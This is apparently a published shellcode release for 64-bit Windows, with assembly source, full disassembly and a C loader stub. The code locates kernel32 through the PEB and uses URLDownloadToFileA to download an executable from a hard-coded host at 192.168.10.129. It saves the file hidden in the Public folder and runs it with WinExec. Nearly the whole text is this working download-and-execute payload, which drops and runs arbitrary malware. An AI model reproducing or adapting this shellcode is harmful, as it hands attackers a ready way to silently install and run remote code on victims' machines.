	# Title : Windows x64 Download+Execute Shellcode
	# Author : Roziul Hasan Khan Shifat
	# Date : 24-11-2016
	# size : 358 bytes
	# Tested on : Windows 7 x64 Professional
	# Email :  



section .text
	global _start


sub rsp,88

lea r14,[rsp]
sub rsp,88


xor rdx,rdx
mov rax,[gs:rdx+0x60] ;PEB
mov rsi,[rax+0x18] ;PEB.Ldr
mov rsi,[rsi+0x10] ;PEB.Ldr->InMemOrderModuleList
mov rsi,[rax]
mov rdi,[rsi+0x30] ;kernel32.dll base address


mov ebx,[rdi+0x3c] ;elf_anew
add rbx,rdi
mov dl,0x88
mov ebx,[rbx+rdx]
add rbx,rdi

mov esi,[rbx+0x1c]
add rsi,rdi

;loading urlmon.dll

mov dx,831
mov ebx,[rsi+rdx*4]
add rbx,rdi

xor rdx,rdx

mov [r14],dword 'urlm'
mov [r14+4],word 'on'
mov [r14+6],byte dl

lea rcx,[r14]

call rbx

mov dx,586
mov ebx,[rsi+rdx*4]
add rbx,rdi

xor rdx,rdx

mov rcx,'URLDownl'
mov [r14],rcx
mov rcx,'oadToFil'
mov [r14+8],rcx
mov [r14+16],word 'eA'
mov [r14+18],byte dl

lea rdx,[r14]
mov rcx,rax

call rbx

mov r15,rax

;save as 'C:\\Users\\Public\\p.exe' length: 24+1

mov rax,'C:\\User'
mov [r14],rax
mov rax,'s\\Publi'
mov [r14+8],rax
mov rax,'c\\p.exe'
mov [r14+16],rax

xor rdx,rdx
mov [r14+24],byte dl


lea rcx,[r14+25]

;url "" length: 28+1

mov rax,'http://1'
mov [rcx],rax
mov rax,'92.168.1'
mov [rcx+8],rax
mov rax,'0.129/pl'
mov [rcx+16],rax
mov [rcx+24],dword '.exe'
mov [rcx+28],byte dl


sub rsp,88

xor rcx,rcx
lea rdx,[r14+25]
lea r8,[r14]
xor r9,r9
mov [rsp+32],r9

call r15

xor rdx,rdx
cmp rax,rdx
jnz download

sub rsp,88
;hiding file

mov dx,1131
mov ebx,[rsi+rdx*4]
add rbx,rdi ;SetFileAttributesA()

lea rcx,[r14]
xor rdx,rdx
mov dl,2

call rbx

;executing file
xor rdx,rdx
mov dx,1314
mov ebx,[rsi+rdx*4]
add rbx,rdi ;WinExec()

lea rcx,[r14]

xor rdx,rdx

call rbx

xor rdx,rdx
mov dx,296
mov ebx,[rsi+rdx*4]
add rbx,rdi


;if U use this shellcode for pe injection, then don't forget to free allocated space

add rsp,88
xor rcx,rcx
call rbx



Disassembly of section .text:

0000000000000000 <_start>:
   0:	48 83 ec 58          	sub    $0x58,%rsp
   4:	4c 8d 34 24          	lea    (%rsp),%r14
   8:	48 83 ec 58          	sub    $0x58,%rsp
   c:	48 31 d2             	xor    %rdx,%rdx
   f:	65 48 8b 42 60       	mov    %gs:0x60(%rdx),%rax
  14:	48 8b 70 18          	mov    0x18(%rax),%rsi
  18:	48 8b 76 10          	mov    0x10(%rsi),%rsi
  1c:	48 ad                	lods   %ds:(%rsi),%rax
  1e:	48 8b 30             	mov    (%rax),%rsi
  21:	48 8b 7e 30          	mov    0x30(%rsi),%rdi
  25:	8b 5f 3c             	mov    0x3c(%rdi),%ebx
  28:	48 01 fb             	add    %rdi,%rbx
  2b:	b2 88                	mov    $0x88,%dl
  2d:	8b 1c 13             	mov    (%rbx,%rdx,1),%ebx
  30:	48 01 fb             	add    %rdi,%rbx
  33:	8b 73 1c             	mov    0x1c(%rbx),%esi
  36:	48 01 fe             	add    %rdi,%rsi
  39:	66 ba 3f 03          	mov    $0x33f,%dx
  3d:	8b 1c 96             	mov    (%rsi,%rdx,4),%ebx
  40:	48 01 fb             	add    %rdi,%rbx
  43:	48 31 d2             	xor    %rdx,%rdx
  46:	41 c7 06 75 72 6c 6d 	movl   $0x6d6c7275,(%r14)
  4d:	66 41 c7 46 04 6f 6e 	movw   $0x6e6f,0x4(%r14)
  54:	41 88 56 06          	mov    %dl,0x6(%r14)
  58:	49 8d 0e             	lea    (%r14),%rcx
  5b:	ff d3                	callq  *%rbx
  5d:	66 ba 4a 02          	mov    $0x24a,%dx
  61:	8b 1c 96             	mov    (%rsi,%rdx,4),%ebx
  64:	48 01 fb             	add    %rdi,%rbx
  67:	48 31 d2             	xor    %rdx,%rdx
  6a:	48 b9 55 52 4c 44 6f 	movabs $0x6c6e776f444c5255,%rcx
  71:	77 6e 6c 
  74:	49 89 0e             	mov    %rcx,(%r14)
  77:	48 b9 6f 61 64 54 6f 	movabs $0x6c69466f5464616f,%rcx
  7e:	46 69 6c 
  81:	49 89 4e 08          	mov    %rcx,0x8(%r14)
  85:	66 41 c7 46 10 65 41 	movw   $0x4165,0x10(%r14)
  8c:	41 88 56 12          	mov    %dl,0x12(%r14)
  90:	49 8d 16             	lea    (%r14),%rdx
  93:	48 89 c1             	mov    %rax,%rcx
  96:	ff d3                	callq  *%rbx
  98:	49 89 c7             	mov    %rax,%r15
  9b:	48 b8 43 3a 5c 5c 55 	movabs $0x726573555c5c3a43,%rax
  a2:	73 65 72 
  a5:	49 89 06             	mov    %rax,(%r14)
  a8:	48 b8 73 5c 5c 50 75 	movabs $0x696c6275505c5c73,%rax
  af:	62 6c 69 
  b2:	49 89 46 08          	mov    %rax,0x8(%r14)
  b6:	48 b8 63 5c 5c 70 2e 	movabs $0x6578652e705c5c63,%rax
  bd:	65 78 65 
  c0:	49 89 46 10          	mov    %rax,0x10(%r14)
  c4:	48 31 d2             	xor    %rdx,%rdx
  c7:	41 88 56 18          	mov    %dl,0x18(%r14)
  cb:	49 8d 4e 19          	lea    0x19(%r14),%rcx
  cf:	48 b8 68 74 74 70 3a 	movabs $0x312f2f3a70747468,%rax
  d6:	2f 2f 31 
  d9:	48 89 01             	mov    %rax,(%rcx)
  dc:	48 b8 39 32 2e 31 36 	movabs $0x312e3836312e3239,%rax
  e3:	38 2e 31 
  e6:	48 89 41 08          	mov    %rax,0x8(%rcx)
  ea:	48 b8 30 2e 31 32 39 	movabs $0x6c702f3932312e30,%rax
  f1:	2f 70 6c 
  f4:	48 89 41 10          	mov    %rax,0x10(%rcx)
  f8:	c7 41 18 2e 65 78 65 	movl   $0x6578652e,0x18(%rcx)
  ff:	88 51 1c             	mov    %dl,0x1c(%rcx)
 102:	48 83 ec 58          	sub    $0x58,%rsp

0000000000000106 <download>:
 106:	48 31 c9             	xor    %rcx,%rcx
 109:	49 8d 56 19          	lea    0x19(%r14),%rdx
 10d:	4d 8d 06             	lea    (%r14),%r8
 110:	4d 31 c9             	xor    %r9,%r9
 113:	4c 89 4c 24 20       	mov    %r9,0x20(%rsp)
 118:	41 ff d7             	callq  *%r15
 11b:	48 31 d2             	xor    %rdx,%rdx
 11e:	48 39 d0             	cmp    %rdx,%rax
 121:	75 e3                	jne    106 <download>
 123:	48 83 ec 58          	sub    $0x58,%rsp
 127:	66 ba 6b 04          	mov    $0x46b,%dx
 12b:	8b 1c 96             	mov    (%rsi,%rdx,4),%ebx
 12e:	48 01 fb             	add    %rdi,%rbx
 131:	49 8d 0e             	lea    (%r14),%rcx
 134:	48 31 d2             	xor    %rdx,%rdx
 137:	b2 02                	mov    $0x2,%dl
 139:	ff d3                	callq  *%rbx
 13b:	48 31 d2             	xor    %rdx,%rdx
 13e:	66 ba 22 05          	mov    $0x522,%dx
 142:	8b 1c 96             	mov    (%rsi,%rdx,4),%ebx
 145:	48 01 fb             	add    %rdi,%rbx
 148:	49 8d 0e             	lea    (%r14),%rcx
 14b:	48 31 d2             	xor    %rdx,%rdx
 14e:	ff d3                	callq  *%rbx
 150:	48 31 d2             	xor    %rdx,%rdx
 153:	66 ba 28 01          	mov    $0x128,%dx
 157:	8b 1c 96             	mov    (%rsi,%rdx,4),%ebx
 15a:	48 01 fb             	add    %rdi,%rbx
 15d:	48 83 c4 58          	add    $0x58,%rsp
 161:	48 31 c9             	xor    %rcx,%rcx
 164:	ff d3                	callq  *%rbx



char shellcode[]=\


int main()
int len=strlen(shellcode);
DWORD l=0;
printf("shellcode length : %d\n",len);
(* (int(*)()) shellcode)();

return 0;
